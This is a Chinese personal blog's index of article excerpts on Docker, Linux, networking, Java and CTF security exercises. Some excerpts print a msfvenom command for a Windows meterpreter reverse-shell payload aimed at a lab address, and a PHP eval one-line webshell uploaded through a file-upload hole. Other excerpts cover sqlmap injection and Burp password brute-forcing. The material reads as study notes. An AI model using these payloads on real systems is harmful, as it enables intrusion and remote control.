Xionghuimin的博客

原创 对intruder的爆破结果进行筛选和导出

第一步第二步

原创 django.template.exceptions.TemplateDoesNotExist: basic.html {% extends ‘basic.html‘ %}

写一下问题关键字，方便被搜索到{% extends 'basic.html' %} django.template.exceptions.TemplateDoesNotExist: basic.htmlError during template renderingIn template C:\Users\Administrator\Desktop\VSS\vsapp\templates\vssapp\Manual.html, error at line 1这个坑我必须记一下，不能忍，浪费我

原创 Docker Compose: Volume declared as external, but could not be found

Docker Compose：卷已声明为外部卷，但找不到(Docker Compose: Volume declared as external, but could not be found)参考文章：https://www.it1352.com/2052692.html

原创 msf中收到了sessions却不反弹meterpreter的原因

msf中收到了sessions却不反弹meterpreter的原因问题描述：生成木马​msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcplhost=192.168.189.130 lport=12346 -f exe >/hack.exe监听并激活use exploit/multi/handler‍‍进入监听模块exploit/multi/handler​是一个后门模块，配置一个反弹会话处理

原创 做好的容器如何保存成镜像并导出、导入

目录1、容器命名2、基于容器创建镜像3、导出镜像到本地4、导入镜像到docker1、容器命名例如 “php+mysql的GET型报错注入” 这题命名为 “ php_mysql_get_type_error_injection ”一个人可能做多个容器，所以在自己的系统里最好也命名清楚不然容易弄混，所以这里附上一条修改容器名字的命令docker 容器（服务）重命名只要一个命令就可以：docker rename 原容器名 新容器名2、基于容器创建镜像命令格式：docker commit -

原创 vim非正常退出导致再次打开时不能正常编辑

解决过程如上截图所示，使用ls -a命令查看隐藏swp文件(隐藏文件都以.开头)：查看当前目录下与打开的文件同名的.swp文件，如other.conf显示为.other.conf.swp使用rm -rf删除这个.swp文件，当再打开需要编辑的文件时，便不会弹出警告信息。需要注意的是不要忘记swp文件的开头是有个.的，rm -rf如果删除文件后没有错误提示不代表删除成功，你删除的可能是不存在的文件，所有没有错误提示，像我上面的截图就有出现这种情况。...

原创 安装lrzsz在xshell中上传文件

原创 linux中的 ~ 目录是什么目录

“~” 目录实验“~”目录其实就是当前用户目录在root用户登入的情况下你切换到/root" 则就是“~”目录，如下所示：同理在普通用户登入的情况下你切换到 “/home/ 普通用户”目录则就是“~”目录，如下所示：...

原创 kali虚拟机第一次设置root密码

我的虚拟机时kali官方下载的虚拟机版本Kali-Linux-2020.2-amd64.vmwarevm这种虚拟机版本可以直接在虚拟机中打开，省去了安装时间，打开后用kali用户登入，kali用户的默认密码是kali使用kali用户登入后要改root用户的密码，root用户没有默认设置密码，所以要用我上方截图的命令进行设置...

原创 jar文件无法双击打开——及记一次burpsuit安装中遇到的问题

问题描述安装和配置好jdk后无法双击打开.jar后缀的文件且右键打开方式中也没有Java™ Platform SE binaryJava环境配置成功的截图对于该问题已尝试过的方法解决的过程如下尝试方法一：网上看到的最多的解决方法是下方这个链接中的方法双击jar文件无法打开的问题但是到改注册表这一步时，我的电脑里没有HKEY_CLASSES_ROOT\Applications\javaw.exe\shell\open\command这个目录只有”计算机\HKEY_CLASSES_RO

原创 在服务器上安装ubuntu （server版本）

首先总结一下这次在服务器上安装系统的想法，在服务器上安装系统和在电脑上安装系统没有什么区别，安装的过程也不难，最难的地方就是对不同主机的快捷键不熟悉，在不知道快捷键的情况下要一个个去试实在是太花时间了安装过程1、 首先需要一个U盘，把需要安装的系统的镜像烧录到U盘内。（这里需要注意的是最好用一个好点的U盘，不然因为U盘有坏道装到一半遇到问题了就很尴尬，在刻录之前可以使用DiskGenius测一下U盘的坏道情况）可用的烧录软件有rufus-3.10 、Win32DiskImager等。2、 将U盘

原创 sqlmap注入——POST检测点方法

一、题目二、解题过程2.1 在输入框输入'号，发现有错误提示，说明存在sql注入2.2 输入数字1我们可以看到他从数据库中调出了数据，从burpsuite的抓包情况来看，提交了id1=1&submit=Submit，但是url地址栏却没有任何显示，所以是post请求（如果是get请求则会在url地址栏中显示）2.3.1 sqlmap注入——POST检测点，将burpsuit抓包到的request请求内容复制到一个文本文件然后改名为.log后缀名的文件如下所示，然后进行注入2.3.2

原创 文件上传漏洞—蚁剑连接地址错误、一句话木马php语法错误

题目第一步：把写有<?php phpinfo(); ?>代码的txt文件改文件名为infor.jpg，上传过程中用burpsuite抓包修改为infor.php。提示上传成功后在url中可以打开第二步：把写有<?php phpinfo(); @eval($_POST['shell']);?>代码的txt文件改文件名为infors.jpg，上传过程中用burpsuite抓包修改为infors.php。提示上传成功后在url中打开但是什么也没有显示，蚁剑也连接不上。

原创 如何让php文件在xampp中运行并查看——使用浏览器查看xampp目录下的文件

首先看一下xampp软件的目录在结合下面这张图我们可以发现xampp软件目录下的htdocs目录对应于localhost，htdocs /dashboard对应 localhost/dashboard如下图所示，那么我们要运行测试php文件或者其他文件则可以放在htdocs/xampp目录下，然后在浏览器中输入相应的地址...

原创 如何通过浏览器访问docker中tomcat容器中的文件

如上图所示，我的xiong.jpg图片文件事在tomcat容器中的/usr/local/tomcat/webapps/var/www/html目录下，那么在浏览器中访问时我要输入的url地址如下图所示，

原创 GRE+ospf+ipsec的配置

布局及ip配置图一、GRE的配置命令为：tunnel0的配置路由器0Router>enRouter#conf tRouter(config)#interface tunnel 0 （启用GRE隧道）Router(config-if)#ip add 10.10.13.1 255.255.255.252 （为隧道配置IP地址）Router(config-if)#tunnel source serial0/3/0（配置隧道的本地源端口）Router(config-if)#tunnel d

原创 关于路由交换技术一些细小知识点的整理

本地环回接口（loopback）此类接口是应用最为广泛的一种虚接口，几乎在每台路由器上都会使用。常见于如下用途。1 作为一台路由器的管理地址系统管理员完成网络规划之后，为了方便管理，会为每一台路由器创建一个loopback 接口，并在该接口上单独指定一个IP 地址作为管理地址，管理员会使用该地址对路由器远程登录（telnet ），该地址实际上起到了类似设备名称一类的功能。但是通常每台路由器上存在众多接口和地址，为何不从当中随便挑选一个呢？原因如下：由于telnet 命令使用TCP 报文，会

原创 虚拟机连不上网怎么办

我以前遇到过几次虚拟机连不上网的问题，花了好久时间都解决不了，最后是重装系统或者在网上看别人的博客依葫芦画瓢解决的，但总的来说前几次都不懂原理。这个问题很多新手都会遇到，希望能够帮大家解决，因为我知道遇到问题花了一个下午甚至几天却没有头绪的感觉真的很郁闷。下面步入正题：一、首先看这篇博客了解虚拟机三种联网方式的原理VMware虚拟机三种网络模式详解这篇linux公社的博客，讲解的不仅全面而且条理清晰，网上很多博客都是照抄甚至复制黏贴这篇博客的。刚开始学计算机网络的新生可能会看不懂这些原理，不过没关系，

原创 广播的mac地址与我的电脑的mac地址一样的原因，及mac扫描器扫描不全面

在mac扫描器这里我遇到了个很疑惑的问题，我用mac地址扫描器扫描我的电脑所在的网段，电脑连的wifi此时有三台手机和一台电脑，需要四个ip地址，在加上路由器要一个地址，所以总共是5太设备5个ip地址。虽然我扫描到的结果也是5台设备，可是为什么我电脑的mac地址占了两个ip地址，其中一个还是广播地址。更奇怪的是扫描的结果漏了一台手机设备经过查找资料与询问我明白了原因，因为有的时候mac地址扫描...

原创 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-

问题：HDFS Shell命令报错：WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform… using builtin-java classes where applicable解决方案在hadoop安装目录下/etc/hadoop/hadoop-env.sh 文件下最后面添加下方...

原创 静态路由及三层交换机的配置

一、题目二、解题截图1、 布局图及ip与网段的配置2、 多层交换机的配置3、三个路由器的静态路由配置4、ping通的截图

原创 强制卸载某些卸载不了的软件（例如卸载samba）

以卸载samba为例，以后遇到类似问题可套用命令。这次做实验时我遇到的问题是卸载centos中的samba服务器，可是因为依赖关系，多方尝试后采用了如下截图的命令卸载成功知识点总结：（1）sudo命令用于切换到管理员用户（root用户）（2）rpm -e 表示卸载rpm包。-q 查询已安装的软件信息-i 安装rpm包-u 升级rpm包–replacepkgs 重新安装rpm...

原创 组建Ad Hoc模式无线局域网

组建Ad Hoc模式无线局域网一、 实验目的：掌握在没有无线访问接入点（Wireless Access Point,AP）的情况下，如何通过无线网卡直接组件建无线 局域网，实现移动网络中智能终端设备之间直接互连的方法。二、实验拓扑三、实验设备笔记本电脑（2台）或测试PC（2台）、外置USB无线局域网网卡（2块）。四、实验原理Ad Hoc结构无线局域网组网模式是一种省去无线中介无线接...

原创 破解密码使用“burpsuite的intruder”功能

一、首先是burpsuite的intruder的文字介绍见博客BurpSuite系列(五)----Intruder模块(暴力破解)该博客网址为https://blog.csdn.net/u011781521/article/details/54772795二、以攻防世界的小白新手题为实例题目描述：小宁写了一个登陆验证页面，随手就设了一个密码。三、解题的文字描述XCTF篇：Web (...

原创 “burpsuit中repeater功能如何使用”及“如何修改X-Forwarded-For和Referer”

一、以下题为例“ XCTF攻防世界web新手练习—xff_referer ”X老师告诉小宁其实xff和referer是可以伪造的。X-Forwarded-For和Referer的定义以及该题的文字描述解题过程见下方这两个写的比较好的博客https://blog.csdn.net/silence1_/article/details/89646461https://blog.csdn.ne...

原创 如何判断一个字符串是否经过base64加密过？

1、2、3、作者：wuxinliulei链接：https://www.zhihu.com/question/20304015/answer/71645651来源：知乎著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。import java.io.BufferedReader;import java.io.File;import java.io.FileIn...

原创 ROT13加密与解密（一种加密和解密都会得到同样答案的密文）“替换式密码算法”

一、 ROT13简介：ROT13（回转13位）是一种简易的替换式密码算法。它是一种在英文网络论坛用作隐藏八卦、妙句、谜题解答以及某些脏话的工具，目的是逃过版主或管理员的匆匆一瞥。ROT13 也是过去在古罗马开发的凯撒密码的一种变体。ROT13是它自身的逆反，即：要还原成原文只要使用同一算法即可得，故同样的操作可用于加密与解密。该算法并没有提供真正密码学上的保全，故它不应该被用于需要保全的用途上。...

原创 robots xctf 攻防世界 web新手练习区

robots题目描述：X老师上课讲了Robots协议，小宁同学却上课打了瞌睡，赶紧来教教小宁Robots协议是什么吧。解题过程 首先打开题目后发现是一个空网页...

原创 view_source xctf 攻防世界 web新手练习区

view-source题目描述：X老师让小宁同学查看一个网页的源代码，但小宁同学发现鼠标右键好像不管用了。打开题目场景课看到的页面为本题考查的知识点为 view-source 协议解题过程打开题目场景时，我们无法点击右键查看网页源码，根据上方view-source的知识点可解出flag，如下截图。...

原创 输入一串字符，去掉字符中的空格后输出中间没有空格的字符串

输入一串字符，去掉字符中的空格后输出中间没有空格的字符串代码如下import java.util.Scanner;public class StringUtil{ public static void main(String[] args){ Scanner in=new Scanner(System.in); String A=in.nextLine...

原创 java中为什么String（string）中的S要大写

java中为什么String（string）中的S要大写原因java中的八种基本数据类型，分别是：boolean,byte,short,int,long,char,float,double它们还分别对应八种封装好的类：Boolean，Byte,Short,Integer,Long,Character,Float,Double。而String也是Java中封装好的一个类。不是基本数据类...

原创 安装windows+linux双系统

安装windows+linux双系统（我安装用的是Windows 10 + CentOS 7）一、安装Windows系统一般人的电脑一开始是有一个windows系统的，所以安装windows系统就不赘述了，可以自行百度，下面我们直接开始在windows系统下安装CentOS 7的教学二、安装CentOS 7上官网找CentOS的镜像，下载到电脑磁盘CentOS官网的超链接 ...